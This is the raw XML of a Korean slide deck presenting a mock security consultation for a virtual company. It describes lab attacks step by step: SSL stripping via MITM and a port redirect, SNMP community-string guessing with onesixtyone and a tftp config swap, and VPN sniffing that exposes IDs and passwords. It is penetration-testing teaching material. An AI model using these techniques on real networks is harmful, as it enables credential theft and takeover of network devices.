            </a:r>
            <a:endParaRPr kumimoji="0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51686" y="103381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SSL Strip Attack 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70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1" name="그림 110" descr="https://lh4.googleusercontent.com/eX5tyRh6GaPYuNxtkTRIVUs36vt_p5Gvm5c9Pnawy1kWbBAqUNq1E9WTpQbrjsSurQnRQ6AnCsDsEy5VOXm0gowBoas7M9enYLhh4r1aP9Ityq3LeTb2OBsf7bqrbPtOg261Sepj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947" y="920099"/>
            <a:ext cx="4402544" cy="275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0" name="그림 111" descr="https://lh4.googleusercontent.com/0YeSixLJoljmks9Yu3nCPZFUSrnvou_jVRKdV2q9h24s5QBc08R98noTdai24OTZgfdOsIDVLNue4yfP7Qmd_1QHABxYUTL_JfoUss-1ijI3BfVxKiHhJQQVpQe6hT1SkLiVx4a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159" y="920098"/>
            <a:ext cx="4502642" cy="275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69" name="그림 112" descr="https://lh5.googleusercontent.com/AK2-kItmOzfpGHZnGu7ZIu6JVXrb6sW3EuX8i1y-ELcjvLNPUHNCtV4NbgofhwWE9Wz7OQaE8BgbygZjaUvU8PYDOfoeebILb2v2HXfkf36bxkSyNIaN-TN1ZOKwg7Vxnz93vhWJ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947" y="4386578"/>
            <a:ext cx="4402544" cy="238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3254644" y="1108959"/>
            <a:ext cx="69361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ko-KR" altLang="en-US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765819" y="2674168"/>
            <a:ext cx="69361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endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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3046672" y="3673944"/>
            <a:ext cx="813806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Gateway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와 개발관리부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MITM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상태를 만들고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80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번 포트로 접근을 시도하면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10000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번 포트로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Redirect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시키겠다는 방화벽 설정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6966491" y="4797570"/>
            <a:ext cx="477902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Sslstrip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툴 실행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–l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옵션으로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10000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포트로 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 들어오는 요청에 대해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http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로 접근하도록</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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설정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51686" y="103381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SSL Strip Attack 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587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그림 113" descr="https://lh4.googleusercontent.com/O473fURzCpO7ePGWsNGM_oX3fFvxGW-h_VlAQnXV8LAfWhbdPUDrpFJ-KAkFRv3y4KtBAyRngVqjPxaeVlrn1S_kD-ihmfiAXAPY6cK37KNITygB_Y_Ax8G5redjZtp3qFC18q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598" y="890296"/>
            <a:ext cx="4210266" cy="246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그림 114" descr="https://lh5.googleusercontent.com/VDnpQYGAuNdRMTv4hkIMRBiclUu8GdVV1tXJnv5GAGTf51L1GTURJDfk5G6n0MJnVD0jesqdlcNL1DbwsHCzaRdm-ejUOcRJuaDzCUHa_ept7gT7LyoH2zi-3dmRIZESV1EHAyI-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267" y="868988"/>
            <a:ext cx="4447234" cy="2511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3" name="그림 115" descr="https://lh5.googleusercontent.com/OdaHZv1shQXr0shvPbEXFvFbTzYkj6yOvhuF2pr50AaRCHOMvXHzga122P7W0Ad1S8xL03bej6ae95wZGJXelh-8ysZkf6x0hFZj9VIOP-28xdHtv0POBPMAVwFhSiayTkh3UTW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598" y="3925122"/>
            <a:ext cx="4527019" cy="234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309966"/>
            <a:ext cx="8121112" cy="147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 flipV="1">
            <a:off x="511175" y="1632926"/>
            <a:ext cx="8121112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2616308" y="3478587"/>
            <a:ext cx="89051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개발관리부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로 웹에 접근을 시도</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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: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https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가 아닌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http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로 접근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,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로그온 시도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 rot="10800000" flipV="1">
            <a:off x="2854314" y="6343767"/>
            <a:ext cx="81211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BT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으로 돌아와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Wire Shark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를 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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en-US" altLang="ko-KR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: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아이디와 비밀번호 노출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51686" y="103381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SSL Strip Attack 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16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그림 116" descr="https://lh4.googleusercontent.com/4VZzuAAXvLtriz7smnOQJiq6eh12g-seQqRSKWWx9pi6XFeKrBqDkMLZHGR10JGiWB_SInsebb0dedXGUnOuVezxMvAE5myKf5J60TE7A3gm_PjDd1BHrga7SddR6a9RciwGP4f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978" y="947515"/>
            <a:ext cx="4292867" cy="263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18" name="그림 117" descr="https://lh3.googleusercontent.com/D5CAIHUxeqgOGH3EJihB63lW0X2BhOp7_TfRc7s7BfSOQ9uVhkbWK-8QtzrksUsqmeRU6k6MyFs3Z_3wviMQebSC-pxWhpq-0zEHvK3S6rOJYCVGyEYijEdZtnODwhEopuxnqfB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36" y="947515"/>
            <a:ext cx="4491064" cy="263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17" name="그림 118" descr="https://lh6.googleusercontent.com/bLQ7CW2Z9OlerxRIcvipzgtVe0ATWyAZNfD3Rlq4bGYpE9OvYtsyyuPm_1YXTJiBsHwr3nKcVUu3xtroff1FMha8UnxXQcsWgn3mlmKPIEbEwG_6KgT26Ruc8i5kOvTa1inSgSVz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987" y="4307677"/>
            <a:ext cx="4407858" cy="244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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="508000" y="1626576"/>
            <a:ext cx="722221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2612978" y="3642591"/>
            <a:ext cx="908996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하기 전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, </a:t>
            </a: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snmp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서비스를 지원해주는지 </a:t>
            </a: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nmap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툴을 사용해 확인  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Community String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을 알아 오기 위해 사용할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dictionary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파일인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dict.txt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파일 확인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 rot="10800000" flipV="1">
            <a:off x="6905845" y="4817497"/>
            <a:ext cx="542806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Onesixtyone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툴과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dict.txt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파일을 사용해 공격대상의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Community String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알아오기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51686" y="103381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SNMP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취약점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026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4" name="그림 119" descr="https://lh6.googleusercontent.com/RlA6oNXQ7_uJOT7LvdyoPzIy9ZGiC0p0KbjuJA26K2uhHJLdCaS5ZByypq6Z4Zlz1A-C2no8nq93bcCAgwJIz46C2m_IwyMhWpNKzfid1fjEVGOcWvcMWkxLT7aBWp3-0dQRu6W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466" y="752564"/>
            <a:ext cx="4007673" cy="237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3" name="그림 120" descr="https://lh5.googleusercontent.com/Ut2z5yIDeBiyciMVB0cpZvjBHdH7BY2e9YqRl-KYFCIt0rNu8qSa8DVE9uQ1kHm6WirAL5YbpDgEKNYSA6U6QE1SayMpUSOOxQnarIFHSNh7jpF0f4Y0nARMWhFx_qYa4hqx9dP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761" y="721149"/>
            <a:ext cx="4182913" cy="243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2" name="그림 121" descr="https://lh4.googleusercontent.com/zvYIcVf0YfcBiUYXzrJu09_eFBrIS4gDxSqne5iIgx-Z1VK0YXS8B_TLqXxJ9SF49HjY4dufU4KBvtsrRtS6gjBCor1NTqY7QHHt26Ag02mqNeQPPP72Yd4zAoHogLx4Fu2DBAyz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467" y="3657707"/>
            <a:ext cx="4007673" cy="239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1" name="그림 122" descr="https://lh6.googleusercontent.com/z4DpcdSJeLI9zXtAbjuASSKuO-uR2w4ixyPibxCiX5DE7Nan0taSwA4jJUuoXS3bX2kmT17E38-mzXwa0irJjeIEdFRSoE5RTCxWeg_K83ByOCWn4ATy1gyOfAwf13iJzeBpsES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651" y="3693707"/>
            <a:ext cx="4375309" cy="244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411480"/>
            <a:ext cx="818310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 flipV="1">
            <a:off x="511175" y="1842476"/>
            <a:ext cx="8183105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475324" y="3160200"/>
            <a:ext cx="95867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tftp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을 실행하고 </a:t>
            </a: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up_running_config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, </a:t>
            </a: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copy_running_config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파일 확인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 flipV="1">
            <a:off x="511175" y="5423876"/>
            <a:ext cx="8183105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650208" y="6215492"/>
            <a:ext cx="818310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15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Copy_running_config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파일과 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="15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tftp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를 이용해 공격대상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="15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running_config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상태를 파일로 받고 제대로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="15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running_config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를 받아왔는지 확인</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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51686" y="103381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SNMP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취약점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953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8" name="그림 123" descr="https://lh4.googleusercontent.com/gZLYPyihpVAFMW1HxCSycKqQmpJ2TXRARsRZC6Z-gQVcMTpPIWDie9HOc848XgQVVBqgCJ2fdwmQXuFrHDynJTZdV2pMhAkaN6cEd63jtghIsXNpsmuBo7XoGT5lU0t7rdjmbZ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14" y="776536"/>
            <a:ext cx="4134191" cy="270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7" name="그림 124" descr="https://lh5.googleusercontent.com/Gbm2_1wYDz8fjudLguWEoOjWrBmmX7c4NTkv4w-5FWf23sMgiIklHXKsaCMz0s3wjPH13aKg83s0T1t1kDMf-ly5nC8jBpz4mvBW-Kz6aT3BgGLufpcsPmO6uwF8uU4kxYtE_5P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813" y="791288"/>
            <a:ext cx="4511986" cy="267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6" name="그림 125" descr="https://lh4.googleusercontent.com/Hx_vA5V1fR5ttcdg1D3wul9SCZXWlIHoVXAsmHwJ27VpwZ_9RIKGMK_vPToVj_1C9HckLkMFDUP1zm7v9kNchrzS57c5zc1yPnYMIqzQ5QfdfJFhds2uOW9AsnF4VQk6xJs6tBp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14" y="4053080"/>
            <a:ext cx="4037939" cy="226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5" name="그림 126" descr="https://lh3.googleusercontent.com/tOs8yJxZE7v2VQfY9LE5TSw2BBYICmxkeU37QkevFtsL3HHI8WxtxzL2kMBgcYf8UzVKcFnZ-OPPnZMreyA9qz2l_BC7E_yONg-AEF0LJ3sO8tDjn79p8ZVbQ6f7xG8-yyEKszw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736" y="4043918"/>
            <a:ext cx="4641063" cy="2232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537791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511175" y="1855176"/>
            <a:ext cx="5377912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48166" y="3424736"/>
            <a:ext cx="8001122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받아온</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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running_config</a:t>
            </a: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상태 확인 후 바꾸고 싶은 내용을 파일로 만들고 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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Up_running_config</a:t>
            </a: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파일을 이용해 만든 공격파일을 공격대상에게 보내기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511175" y="5398476"/>
            <a:ext cx="5377912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618529" y="6322923"/>
            <a:ext cx="737249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1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공격이 제대로 됐는지 확인하기 위해 다시</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1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15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running_config</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1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1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상태를 파일로 받고 받아온 파일에서 내가 바꾼 내용이 제대로 적용 됐는지 확인</a:t>
            </a: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51686" y="103381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SNMP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취약점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066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1" name="그림 127" descr="https://lh4.googleusercontent.com/0Sandl5lAFv8U2nlQHmKE8ZtxUYZ52UWOUX2jzb6d4K3zKR2gS7xC8ZZB496sRc7IGIZ8qfYg0pdl16N5PXKwq4poZXuC1v-ZBf70A9RNqCtYO1N65ah_wBqQ5s82i9Yj2mb-F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350" y="913456"/>
            <a:ext cx="4036959" cy="324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0" name="그림 128" descr="https://lh6.googleusercontent.com/DqIDWSJLOZ4sGJU7KPNI6eQmo9X6XOAaGKC8212HQAzSC0VgtKHsEfi2joBaueAIMEDHqRoG7xQgYnTSJC8gFieyP5_0fo626jl0qjblASWrZ0Zhm51G9QO7nq52Y3uFoua_GN1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515" y="946809"/>
            <a:ext cx="4087166" cy="318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89" name="그림 129" descr="https://lh6.googleusercontent.com/fGKzU8KLdTfnKbRyY1z7qAogzLBxFtb84LMbOKR0eB_RB3BetE0ZDd7crHO62FQSIs59M9cLpqeZaa4XtuNZylTauUuELe9Z4f_BY_iIFI-B-mgU8_iI9lNSX7O11wOnRsX2xO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350" y="4946608"/>
            <a:ext cx="8216397" cy="121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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="508000" y="2096476"/>
            <a:ext cx="6695268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2710349" y="4359279"/>
            <a:ext cx="71917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지사의 컴퓨터를 이용해 본사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VPN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서버에 접속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 rot="10800000" flipV="1">
            <a:off x="2789694" y="6287984"/>
            <a:ext cx="71917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Wire Shark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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에서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아이디와 컴퓨터 이름</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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확인가능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51686" y="103381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VPN Sniffing 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509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105017" y="351291"/>
            <a:ext cx="477704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0" spc="3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질문 있나요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" spc="3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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6000" spc="300" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="MD아롱체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="MD아롱체" panose="0202060302010102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528095" y="1089955"/>
            <a:ext cx="321154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33" y="3603416"/>
            <a:ext cx="2260632" cy="22606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922" y="4093142"/>
            <a:ext cx="1980399" cy="198039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82" y="2243911"/>
            <a:ext cx="2601185" cy="26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531443" y="96252"/>
            <a:ext cx="55634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조직현황</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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xmlns="" id="{3EC1E657-5E0E-4D88-9266-8E8745CECA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633032"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2935793" y="1364799"/>
          <a:ext cx="8753745" cy="48411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8135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448496" y="1070806"/>
            <a:ext cx="3915064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spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white">
                    <a:lumMod val="95000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>끝까지 들어주셔서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3000" spc="300" dirty="0">
              <a:solidFill>
                <a:prstClr val="white">
                  <a:lumMod val="95000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3000" spc="300" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white">
                    <a:lumMod val="95000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>감사합니다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3000" spc="300" dirty="0">
              <a:solidFill>
                <a:prstClr val="white">
                  <a:lumMod val="95000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="MD아트체" panose="0202060302010102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072677" y="1457697"/>
            <a:ext cx="1072567" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="9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6915438" y="4870653"/>
            <a:ext cx="1336718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8522827" y="4873244"/>
            <a:ext cx="1336718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811333" y="4900798"/>
            <a:ext cx="152767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D아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>3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D아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>조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MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="MD아트체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436567" y="4870653"/>
            <a:ext cx="1527676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D아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>김동은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MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="MD아트체" panose="02020603020101020101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6924064" y="5445748"/>
            <a:ext cx="1336718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8531453" y="5448339"/>
            <a:ext cx="1336718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6819959" y="5475893"/>
            <a:ext cx="1527676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D아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>곽준희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MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="MD아트체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445193" y="5445748"/>
            <a:ext cx="1527676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D아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>유승호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MD아트체" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="MD아트체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821" y="5658475"/>
            <a:ext cx="120015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7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347" y="1120719"/>
            <a:ext cx="9588925" cy="48403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31443" y="77002"/>
            <a:ext cx="55634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조직현황</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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466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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC83FC7-CF96-42E8-B2EC-03C2E293D055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204191" y="868898"/>
            <a:ext cx="2346626" cy="279268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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="7F1684"/>
                  </a:gs>
                  <a:gs pos="53000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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4" name="사각형: 둥근 모서리 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76DDC85-30B9-4962-8B90-64B8B9A8F7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093121" y="864721"/>
            <a:ext cx="2346626" cy="279268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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="7F1684"/>
                  </a:gs>
                  <a:gs pos="53000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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5" name="사각형: 둥근 모서리 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2B2DC2-EBBC-4817-BC71-CF3E92956865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8982051" y="869557"/>
            <a:ext cx="2346626" cy="279268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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="7F1684"/>
                  </a:gs>
                  <a:gs pos="53000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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6" name="사각형: 둥근 모서리 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6BF9C6B-4F09-4B5D-BD67-72BC786FB392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705412" y="3976569"/>
            <a:ext cx="2346626" cy="279268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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="7F1684"/>
                  </a:gs>
                  <a:gs pos="53000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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7" name="사각형: 둥근 모서리 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DB9CBB-F8EB-477D-85F6-74AC855F85AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7594342" y="3981405"/>
            <a:ext cx="2346626" cy="279268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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="7F1684"/>
                  </a:gs>
                  <a:gs pos="53000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="370D32"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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3" name="그림 2" descr="벡터그래픽이(가) 표시된 사진&#10;&#10;높은 신뢰도로 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3ED2BA-E5B6-4AF7-928E-B54B5D320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367" y="1189521"/>
            <a:ext cx="1760707" cy="17607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1F96D96D-43F8-413C-B76F-A65210E72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153" y="1328614"/>
            <a:ext cx="1590264" cy="15902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A38E503-07D6-4943-B998-D57B965BAB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741" y="1311253"/>
            <a:ext cx="1527391" cy="15273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12D56341-7230-4FF9-9041-213B612209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598" y="4430160"/>
            <a:ext cx="1480647" cy="14806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6AE49996-2663-4CEB-B0EF-3EBE9CE049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596" y="4519079"/>
            <a:ext cx="1546696" cy="15466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B82F6A0-A450-46B0-8A1B-74A3AEBC9397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621327" y="6056431"/>
            <a:ext cx="2537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회사 내부 네트워크에 대한 보안 점검</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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B7FB15B-7EBE-478F-B5D4-B3F4ABAE3C60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7646805" y="6043427"/>
            <a:ext cx="2203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지사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1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직원용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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네트워크 보안 점검</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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7701377-3262-4C9C-8A10-6F73D3EA79E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477899" y="2857086"/>
            <a:ext cx="1760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회사 내부 직원 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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보안 점검</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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C9B0172-3E21-47C3-8534-1946F16D860E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6086591" y="2920407"/>
            <a:ext cx="2346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웹 서버 및 게임 서버에 대한 보안 점검</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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6BB4F2D-C4EC-4B6E-B17C-3A9DE913025D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8879344" y="2922992"/>
            <a:ext cx="2537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기타 서비스 중인 서버에 대한 보안 점검</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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39484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 theme" id="{F3ACB519-17A4-4A6D-9A4D-8FF4DA22E16B}" vid="{63B81DF3-9A3E-49E2-8F54-EAC3F74BF13E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644</TotalTime>
  <Words>2326</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>369</Paragraphs>
  <Slides>70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70</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="89" baseType="lpstr">
      <vt:lpstr>나눔바른고딕 Light</vt:lpstr>
      <vt:lpstr>새굴림</vt:lpstr>
      <vt:lpstr>HY수평선B</vt:lpstr>
      <vt:lpstr>HY강B</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>MD아트체</vt:lpstr>
      <vt:lpstr>DejaVu Sans Mono</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>MD아롱체</vt:lpstr>
      <vt:lpstr>HY동녘B</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>HY견고딕</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>default theme</vt:lpstr>
      <vt:lpstr>디자인 사용자 지정</vt:lpstr>
      <vt:lpstr>3_Office 테마</vt:lpstr>
      <vt:lpstr>4_Office 테마</vt:lpstr>
      <vt:lpstr>가상 회사 보안 컨설팅  - SmileGate   Entertainment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LEEHYEKANG</dc:creator>
  <cp:lastModifiedBy>Master</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-15T23:33:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-03T12:05:36Z</dcterms:modified>
</cp:coreProperties>
</file>